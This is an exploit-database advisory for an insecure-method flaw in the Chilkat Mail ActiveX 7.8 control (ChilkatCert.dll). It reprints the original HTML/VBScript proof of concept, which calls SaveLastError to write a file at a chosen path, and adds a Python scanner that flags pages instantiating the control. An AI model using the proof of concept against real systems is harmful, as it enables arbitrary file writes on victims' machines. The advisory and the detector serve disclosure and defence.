Vendor: Chilkat Mail ActiveX
By: darkl0rd
CVSS: 7.5 (HIGH)
Insecure Method
CWE: 264
Product Name: Chilkat Mail ActiveX
Affected Version From: 7.8
Affected Version To: 7.8
Patch Exists: Yes
Related CWE: N/A
CPE: a:chilkatsoft:chilkat_mail_activex:7.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2008

Chilkat Mail ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit

A vulnerability exists in Chilkat Mail ActiveX 7.8 (ChilkatCert.dll) that allows an attacker to write arbitrary files to the system. It stems from the insecure SaveLastError method, which lets an attacker specify a file path and write arbitrary data to it.

Mitigation:

Update to the latest version of Chilkat Mail ActiveX 7.8 (ChilkatCert.dll)

Exploit-DB raw data:

<body bgcolor="#000000">

<p align="center"><b><font face="Verdana" color="#00FF00" size="2">Chilkat Mail 
ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">Site :
<a href="http://www.chilkatsoft.com"><font color="#00FF00">www.chilkatsoft.com</font></a></font></b></p>
<p align="center"><font color="#00FF00" face="Verdana">
===================================================</font></p>
<p align="center"><b><font face="Verdana" color="#00FF00" size="2">Tested on 
Windows XP Professional SP2 , with Internet Explorer 6</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">Author : 
darkl0rd</font></b></p>
<p align="center"><b><font face="Verdana" size="2" color="#00FF00">E-Mail : 
l_l_darkl0rd_l_l[at]yahoo[dot]com</font></b></p>
<p align="center"><b><font color="#FF0000" face="Verdana" size="2">SaveLastError</font></b></p>
<p align="center">
<object classid='clsid:2A9A3D40-2F32-45BF-9A89-AC9ED6C2FEDF' id='over' align="left"></object>

<input language=VBScript onclick=lose() type=button value="Exploit">

<script language='vbscript'>
 Sub lose
   mystr="c:\darkl0rd.txt"
   over.SaveLastError mystr
   MyMsg = MsgBox("Done !")
 End Sub
</script>
</span></span>

</code></p>
</pre>

# milw0rm.com [2008-01-29]
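
For detection on a web proxy or mail gateway, the following added example (not part of the original advisory or of any Chilkat code) scans HTML for `<object>` tags bound to the CLSID used in the proof of concept and for script calls to SaveLastError through those objects. The names `ControlFinder` and `scan_html` and both sample pages are constructed for illustration, and only instantiation by `classid` is covered.

```python
import re
from html.parser import HTMLParser

# CLSID from the <object> tag in the proof of concept on this page.
CLSID = "2A9A3D40-2F32-45BF-9A89-AC9ED6C2FEDF"

class ControlFinder(HTMLParser):
    """Collect ids of <object> tags bound to CLSID and the text of every script."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "").strip() for k, v in attrs}
        if tag == "script":
            self.in_script = True
        elif tag == "object" and attrs.get("classid", "").lower() == "clsid:" + CLSID.lower():
            self.object_ids.append(attrs.get("id", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def scan_html(html):
    """Return one finding per instantiation of the control, with any
    SaveLastError arguments that scripts pass through that object id."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    script = "\n".join(finder.scripts)
    findings = []
    for oid in finder.object_ids:
        args = []
        if oid:  # VBScript is case-insensitive, hence re.I
            call = re.compile(r"\b%s\s*\.\s*SaveLastError\b[ \t(]*([^\r\n)]*)" % re.escape(oid), re.I)
            args = [m.group(1).strip() for m in call.finditer(script)]
        findings.append({"object_id": oid, "save_last_error_args": args})
    return findings

# Constructed samples (not captured traffic): one page that loads the control, one that does not.
SAMPLE = """<object classid='clsid:2a9a3d40-2f32-45bf-9a89-ac9ed6c2fedf' id='ctl'></object>
<script language='vbscript'>
 Sub run
   ctl.SaveLastError "c:\\example.txt"
 End Sub
</script>"""
BENIGN = "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='x'></object>"
```

A finding with an empty argument list still means the page instantiated the control and is worth reviewing.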